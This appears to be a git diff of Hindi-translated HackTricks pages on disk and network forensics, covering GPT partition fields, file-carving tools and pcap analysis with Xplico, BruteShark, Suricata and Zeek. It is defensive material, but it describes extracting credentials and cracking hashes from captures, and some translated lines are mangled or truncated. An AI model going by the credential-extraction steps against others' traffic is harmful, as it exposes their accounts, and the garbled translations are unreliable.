| 32 (0x20) | 8 बाइट | पहला LBA ([लिटिल एंडियन](https://en.wikipedia.org/wiki/Little\_endian)) | | 32 (0x20) | 8 बाइट | पहला LBA ([लिटिल एंडियन](https://en.wikipedia.org/wiki/Little\_endian)) |
| 40 (0x28) | 8 बाइट | अंतिम LBA (समावेशी, सामान्यत: विषम) | | 40 (0x28) | 8 बाइट | अंतिम LBA (समावेशी, सामान्यत: विषम) |
| 48 (0x30) | 8 बाइट | विशेषता ध्वज (उदाहरण के लिए बिट 60 पढ़ने योग्य दर्शाता है) | | 48 (0x30) | 8 बाइट | विशेषता ध्वज (उदाहरण के लिए बिट 60 पढ़ने योग्यता की निशानी है) |
| 56 (0x38) | 72 बाइट | पार्टीशन नाम (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE कोड इकाइयाँ) | | 56 (0x38) | 72 बाइट | पार्टीशन नाम (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE कोड इकाइयाँ) |
**पार्टीशन प्रकार** **विभाजन प्रकार**
![](<../../../.gitbook/assets/image (492).png>) ![](<../../../.gitbook/assets/image (492).png>)
[https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) में अधिक पार्टीशन प्रकार। [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table) में अधिक विभाजन प्रकार।
### जांच ### जांच
[**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) के साथ फोरेंसिक्स इमेज को माउंट करने के बाद, आप [**Active Disk Editor**](https://www.disk-editor.org/index.html) जैसे Windows टूल का उपयोग करके पहले सेक्टर की जांच कर सकते हैं। निम्नलिखित छवि में एक **MBR** को **सेक्टर 0** पर पहचाना गया था और इसे व्याख्या की गई थी: [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) के साथ फोरेंसिक्स इमेज को माउंट करने के बाद, आप [**Active Disk Editor**](https://www.disk-editor.org/index.html) जैसे विंडोज उपकरण का उपयोग क
![](<../../../.gitbook/assets/image (494).png>)
अगर यह एक **MBR की बजाय एक GPT तालिका** होती, तो **सेक्टर 1** में हस्ताक

View file

@ -4,11 +4,11 @@
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। * **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
@ -26,13 +26,13 @@ HackTricks का समर्थन करने के अन्य तरी
## Autopsy ## Autopsy
छवियों से फ़ाइलें निकालने के लिए ज्यादा प्रयोग किया जाने वाला टूल है [**Autopsy**](https://www.autopsy.com/download/)। इसे डाउनलोड करें, इंस्टॉल करें और फ़ाइल को इंजेस्ट करने के लिए इसे खोजें "छिपी" फ़ाइलें। ध्यान दें कि Autopsy डिस्क छवियों और अन्य प्रकार की छवियों का समर्थन करने के लिए बनाया गया है, लेकिन साध फ़ाइलों का नहीं। छवियों से फ़ाइलें निकालने के लिए ज्यादा प्रयोग किया जाने वाला टूल है [**Autopsy**](https://www.autopsy.com/download/)। इसे डाउनलोड करें, इंस्टॉल करें और फ़ाइल को इंजेस्ट करने के लिए इसे बनाएं "छिपी" फ़ाइलें खोजने के लिए। ध्यान दें कि Autopsy को डिस्क छवियों और अन्य प्रकार की छवियों का समर्थन करने के लिए बनाया गया है, लेकिन साधारण फ़ाइलों का नहीं।
## Binwalk <a href="#binwalk" id="binwalk"></a> ## Binwalk <a href="#binwalk" id="binwalk"></a>
**Binwalk** एक टूल है जो इमेजेस और ऑडियो फ़ाइल्स जैसे बाइनरी फ़ाइलों को खोजने और डेटा के लिए एम्बेडेड फ़ाइलों के लिए है।\ **Binwalk** एक टूल है जो बाइनरी फ़ाइलों का विश्लेषण करने के लिए है जिसमें एम्बेडेड सामग्री खोजने के लिए है। इसे `apt` के माध्यम से स्थापित किया जा सकता है और इसका स्रोत [GitHub](https://github.com/ReFirmLabs/binwalk) पर है।
इसे `apt` के साथ इंस्टॉल किया जा सकता है हालांकि [स्रोत](https://github.com/ReFirmLabs/binwalk) github पर मिल सकता है।\
**उपयोगी कमांड्स**: **उपयोगी कमांड**:
```bash ```bash
sudo apt install binwalk #Insllation sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file binwalk file #Displays the embedded data in the given file
@ -41,7 +41,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
``` ```
## Foremost ## Foremost
छिपी हुई फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost का विन्यास फ़ाइल `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलों की खोज करना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यसित फ़ाइल प्रकारों के लिए खोज करेगा। छिपे हुए फ़ाइलें खोजने के लिए एक और सामान्य उपकरण है **foremost**। आप foremost की विन्यास फ़ाइल को `/etc/foremost.conf` में पा सकते हैं। यदि आप कुछ विशिष्ट फ़ाइलों के लिए खोजना चाहते हैं तो उन्हें uncomment करें। यदि आप कुछ uncomment नहीं करते हैं तो foremost अपने डिफ़ॉल्ट विन्यसत फ़ाइल प्रकारों के लिए खोजेगा।
```bash ```bash
sudo apt-get install foremost sudo apt-get install foremost
foremost -v -i file.img -o output foremost -v -i file.img -o output
@ -62,50 +62,50 @@ scalpel file.img -o output
``` ```
bulk_extractor memory.img -o out_folder bulk_extractor memory.img -o out_folder
``` ```
**उस सी जानकारी** में नेविगेट करें जो टूल ने इकट्ठा की है (पासवर्ड?), **पैकेट्स** का **विश्लेषण** करें (पढ़ें[ **Pcaps विश्लेषण**](../pcap-inspection/)), **अजीब डोमेन** (मैलवेयर से संबंधित या **अस्तित्वहीन**) की खोज करें। **उस सारी जानकारी** में नेविगेट करें जो टूल ने इकट्ठा की है (पासवर्ड?), **पैकेट** का **विश्लेषण** करें (पढ़ें[ **Pcaps विश्लेषण**](../pcap-inspection/)), **अजीब डोमेन** (मैलवेयर से संबंधित या **अस्तित्वहीन**) की खोज करें।
## PhotoRec ## PhotoRec
आप इसे [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download) में पा सकते हैं। आप इसे [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download) में पा सकते हैं।
यह GUI और CLI संस्करणों के साथ आता है। आप चुन सकते हैं **फ़ाइल-प्रकार** जिनकी खोज के लिए PhotoRec को। यह GUI और CLI संस्करणों के साथ आता है। आप फाइल-प्रकार चुन सकते हैं जिनकी खोज के लिए PhotoRec को।
![](<../../../.gitbook/assets/image (524).png>) ![](<../../../.gitbook/assets/image (524).png>)
## binvis ## binvis
कोड की जाँच करें [यहाँ](https://code.google.com/archive/p/binvis/) और [वेब पेज टूल](https://binvis.io/#/)। कोड की [जाँच](https://code.google.com/archive/p/binvis/) और [वेब पेज टूल](https://binvis.io/#/) करें
### BinVis की विशेषताएँ ### BinVis की विशेषताएँ
* दृश्यात्मक और सक्रिय **संरचना दर्शक** * दृश्यात्मक और सक्रिय **संरचना दर्शक**
* विभिन्न फोकस बिंदुओं के लिए एकाधिक चित्र * विभिन्न ध्यान स्थानों के लिए एकाधिक चित्र
* एक नमूने के भागों पर ध्यान केंद्रित करना * एक नमूने के भागों पर ध्यान केंद्रित करना
* **स्ट्रिंग्स और संसाधनों** को देखना, PE या ELF कार्यक्रमों में जैसे * **PE या ELF एक्जीक्यूटेबल्स** में स्ट्रिंग और संसाधन देखना, जैसे कि
* फ़ाइलों पर क्रिप्टनालिसिस के लिए **पैटर्न** प्राप्त करना * फ़ाइलों पर क्रिप्टोएनालिसिस के लिए **पैटर्न** प्राप्त करना
* पैकर या इन्कोडर एल्गोरिदम क**स्पॉट** करना * पैकर या इन्कोडर एल्गोरिदम क**पहचान** करना
* पैटर्न द्वारा स्टेगेनोग्राफी की **पहचान** करना * पैटर्न द्वारा स्टेगेनोग्राफी की **पहचान** करना
* **दृश्यात्मक** बाइनरी-डिफिंग * **दृश्यात्मक** बाइनरी-डिफिंग
BinVis एक महान **शुरुआती बिंदु है** जिससे आप एक अज्ञात लक्ष्य के साथ परिचित हो सकते हैं एक ब्लैक-बॉक्सिंग स्थिति में। BinVis एक अज्ञात लक्ष्य के साथ परिचित होने के लिए एक महान **आरंभ-बिंदु** है एक काल-बॉक्सिंग स्थिति में।
# विशेष डेटा कार्विंग टूल # विशेष डेटा कार्विंग टूल
## FindAES ## FindAES
AES कुंजियों की खोज करने के लिए उनके कुंजी अनुसूचियों की खोज करके FindAES खोजता है। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे कि TrueCrypt और BitLocker द्वारा उपयोग की गई कुंजियाँ अपने की स्केज्यूल्स की खोज करके AES कुंजियों की खोज करता है। 128, 192, और 256 बिट कुंजियों को खोजने में सक्षम है, जैसे कि जो TrueCrypt और BitLocker द्वारा उपयोग की जाती हैं
यहाँ से डाउनलोड करें (https://sourceforge.net/projects/findaes/). यहाँ से डाउनलोड करें (https://sourceforge.net/projects/findaes/).
# पूरक टूल # पूरक टूल
आप [**viu** ](https://github.com/atanunq/viu)का उपयोग कर सकते हैं ताकि आप छवियों को टर्मिनल से देख सकें।\ आप [**viu** ](https://github.com/atanunq/viu)का उपयोग करके छवियों को देखने के लिए कर सकते हैं।\
आप लिनक्स कमांड लाइन टूल **pdftotext** का उपयोग कर हैं ताकि आप एक पीडीएफ को पाठ में परिवर्तित कर सकें और इसे पढ़ सकें। आप लिनक्स कमांड लाइन टूल **pdftotext** का उपयोग करके एक पीडीएफ को पाठ में परिवर्तित करने और इसे पढ़ने के लिए कर सकते हैं।
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
उन वंशावलियताओं को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरे तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक के मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज। जो सबसे अधिक महत्वपूर्ण संकटों को खोजें ताकि आप उन्हें जल्दी ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरे तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम्स तक के मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -115,10 +115,10 @@ AES कुंजियों की खोज करने के लिए उ
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! * यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks** को **PDF** में डाउनलोड करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स और हैकट्रिक्स क्लाउड गिटहब रेपो में पीआर जमा करके। * **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
</details> </details>

View file

@ -6,11 +6,11 @@
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs** सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। * **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट** करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
@ -21,12 +21,12 @@ HackTricks का समर्थन करने के अन्य तरी
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
{% hint style="info" %} {% hint style="info" %}
**PCAP** बनाम **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को Wireshark या किसी अन्य संगत उपकरण का उपयोग करके PCAP से PCAPNG में कनवर्ट करने की आवश्यकता हो सकती है। **PCAP** बनाम **PCAPNG** के बारे में एक नोट: PCAP फ़ाइल प्रारूप के दो संस्करण हैं; **PCAPNG नया है और सभी उपकरणों द्वारा समर्थित नहीं है**। कुछ अन्य उपकरणों में इसके साथ काम करने के लिए आपको एक फ़ाइल को Wireshark या किसी अन्य संगत उपकरण का उपयोग करके PCAP से PCAPNG में परिवर्तित करने की आवश्यकता हो सकती है।
{% endhint %} {% endhint %}
## Pcap के लिए ऑनलाइन उपकरण ## Pcap के लिए ऑनलाइन उपकरण
* यदि आपके pcap का हेडर **टूटा हुआ** है तो आपको इसे ठीक करने की कोशिश करनी चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) * यदि आपके pcap का हेडर **टूटा हुआ** है तो आपको इसे ठीक करने के लिए यह आजमाना चाहिए: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** और **मैलवेयर** खोजें * [**PacketTotal**](https://packettotal.com) में pcap में **जानकारी** और **मैलवेयर** खोजें
* [**www.virustotal.com**](https://www.virustotal.com) और [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) का उपयोग करके **दुष्ट गतिविधि** खोजें * [**www.virustotal.com**](https://www.virustotal.com) और [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) का उपयोग करके **दुष्ट गतिविधि** खोजें
@ -40,7 +40,7 @@ HackTricks का समर्थन करने के अन्य तरी
**यदि आप एक PCAP का विश्लेषण करने जा रहे हैं तो आपको मूल रूप से Wireshark का उपयोग कैसे करना है यह जानना चाहिए** **यदि आप एक PCAP का विश्लेषण करने जा रहे हैं तो आपको मूल रूप से Wireshark का उपयोग कैसे करना है यह जानना चाहिए**
{% endhint %} {% endhint %}
आप Wireshark ट्रिक्स में कुछ जानकारी यहाँ पा सकते हैं: आप Wireshark में कुछ ट्रिक्स यहाँ पा सकते हैं:
{% content-ref url="wireshark-tricks.md" %} {% content-ref url="wireshark-tricks.md" %}
[wireshark-tricks.md](wireshark-tricks.md) [wireshark-tricks.md](wireshark-tricks.md)
@ -48,7 +48,7 @@ HackTricks का समर्थन करने के अन्य तरी
### Xplico Framework ### Xplico Framework
[**Xplico** ](https://github.com/xplico/xplico)_(केवल लिनक्स)_ एक pcap का विश्लेषण कर सकता है और इससे जानकारी निकाल सकता है। उदाहरण के लिए, pcap फ़ाइल से Xplico, प्रत्येक ईमेल (POP, IMAP, और SMTP प्रोटोकॉल), सभी HTTP सामग्री, प्रत्येक VoIP कॉल (SIP), FTP, TFTP, और इत्यादि निकालता है। [**Xplico** ](https://github.com/xplico/xplico)_(केवल लिनक्स)_ एक **pcap** का विश्लेषण कर सकता है और इससे जानकारी निकाल सकता है। उदाहरण के लिए, एक pcap फ़ाइल से Xplico, प्रत्येक ईमेल (POP, IMAP, और SMTP प्रोटोकॉल), सभी HTTP सामग्री, प्रत्येक VoIP कॉल (SIP), FTP, TFTP, और इत्यादि निकालता है।
**स्थापित करें** **स्थापित करें**
```bash ```bash
@ -62,29 +62,27 @@ sudo apt-get install xplico
/etc/init.d/apache2 restart /etc/init.d/apache2 restart
/etc/init.d/xplico start /etc/init.d/xplico start
``` ```
उपयुक्तता _**127.0.0.1:9876**_ के साथ पहुंचने के लिए _**xplico:xplico**_ क्रेडेंशियल का उपयोग करें। पहुँच _**127.0.0.1:9876**_ के साथ पहुँचने के लिए पहुँचकर्ता _**xplico:xplico**_
फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap** फ़ाइल **अपलोड** करें। फिर **नया मामला** बनाएं, मामले के अंदर **नई सत्र** बनाएं और **pcap** फ़ाइल **अपलोड** करें।
### NetworkMiner ### NetworkMiner
Xplico की तरह यह एक उपकरण है जो pcaps से वस्तुओं का **विश्लेषण और निकालना** करने के लिए है। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\ Xplico की तरह यह एक उपकरण है जो **pcaps से वस्तुओं का विश्लेषण और निकालना** करने के लिए है। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\
यह उपकरण भी **पैकेट्स से अन्य जानकारी प्राप्त** करने के लिए उपयोगी है ताकि आप एक **तेज़ तरीके से** क्या हो रहा था उसे जान सकें यह उपकरण भी **पैकेट्स से अन्य जानकारी प्राप्त** करने के लिए उपयोगी है ताकि एक **तेज़ तरीके से** क्या हो रहा था उसे पता चल सके
### NetWitness Investigator ### NetWitness Investigator
आप [**यहाँ से NetWitness Investigator डाउनलोड कर सकते हैं**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(यह Windows में काम करता है)**।\ आप [**यहाँ से NetWitness Investigator डाउनलोड कर सकते हैं**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(यह Windows में काम करता है)**।\
यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि आप अंदर क्या हो रहा है उसे जान सकें। यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि **अंदर क्या हो रहा है** उसे पता चल सके।
![](<../../../.gitbook/assets/image (567) (1).png>)
### [BruteShark](https://github.com/odedshimon/BruteShark) ### [BruteShark](https://github.com/odedshimon/BruteShark)
* उपयोगकर्ता नाम और पासवर्ड (HTTP, FTP, Telnet, IMAP, SMTP...) का निकालना और एन्कोडिंग * उपयोगकर्ता नाम और पासवर्ड (HTTP, FTP, Telnet, IMAP, SMTP...) को निकालना और एन्कोड करना
* प्रमाणीकरण हैश का निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) * प्रमाणीकरण हैश निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* एक विजुअल नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता) * एक दृश्यात्मक नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता)
* DNS क्वेरी का निकालना * DNS पूछताछ निकालना
* सभी TCP और UDP सत्रों का पुनर्निर्माण * सभी TCP और UDP सत्रों का पुनर्निर्माण करना
* फ़ाइल कार्विंग * फ़ाइल कार्विंग
### Capinfos ### Capinfos
@ -115,11 +113,11 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## जांच करें एक्सप्लॉइट्स/मैलवेयर ## जांच करें Exploits/Malware
### Suricata ### Suricata
**स्थापित करें और सेटअप करें** **स्थापित और सेटअप**
``` ```
apt-get install suricata apt-get install suricata
apt-get install oinkmaster apt-get install oinkmaster
@ -130,19 +128,19 @@ oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
``` ```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
``` ```
### YaraPcap ### यारापीसीएपी
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) एक टूल है जो [**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) एक टूल है जो
* एक PCAP फ़ाइल पढ़ता है और Http Streams निकालता है। * एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम्स निकालता है।
* किसी भी संपीडित स्ट्रीम को gzip डिफ़्लेट करता है * किसी भी संपीडित स्ट्रीम को gzip डिफ़्लेट करता है
* हर फ़ाइल को yara के साथ स्कैन करता है * हर फ़ाइल को यारा के साथ स्कैन करता है
* रिपोर्ट.txt लिखता है * रिपोर्ट.txt लिखता है
* वैकल्पिक रूप से मिलने वाली फ़ाइलों को एक डिर में सहेजता है * वैकल्पिक रूप से मिलने वाली फ़ाइलों को एक डिर में सहेजता है
### Malware Analysis ### मैलवेयर विश्लेषण
क्या आप किसी जाने-माने मैलवेयर के किसी भी आंकड़े का पता लगा सकते हैं: जांच करें कि क्या आप किसी जाने-माने मैलवेयर का कोई आंकड़ा खोज सकते हैं:
{% content-ref url="../malware-analysis.md" %} {% content-ref url="../malware-analysis.md" %}
[malware-analysis.md](../malware-analysis.md) [malware-analysis.md](../malware-analysis.md)
@ -150,11 +148,11 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
## Zeek ## Zeek
> Zeek एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर संदेश या दुराचार गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek नेटवर्क सुरक्षा डोमेन के अलावा एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और ट्रबलशूटिंग शामिल है > [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर्स संदेहात्मक या दुराचार गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek इसके अलावा सुरक्षा डोमेन के पार एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और समस्या सुलझाने जैसे कार्य शामिल हैं
मूल रूप से, `zeek` द्वारा बनाए गए लॉग **pcaps** नहीं हैं। इसलिए आपको लॉग विश्लेषित करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **जानकारी** pcaps के बारे में है। मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग का विश्लेषण करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **जानकारी** पीकैप्स के बारे में होती है।
### Connections Info ### कनेक्शन जानकारी
```bash ```bash
#Get info about longest connections (add "grep udp" to see only udp traffic) #Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?) #The longest connection might be of malware (constant reverse shell?)
@ -239,20 +237,20 @@ rita show-exploded-dns -H --limit 10 zeek_logs
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है। [**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
<details> <details>
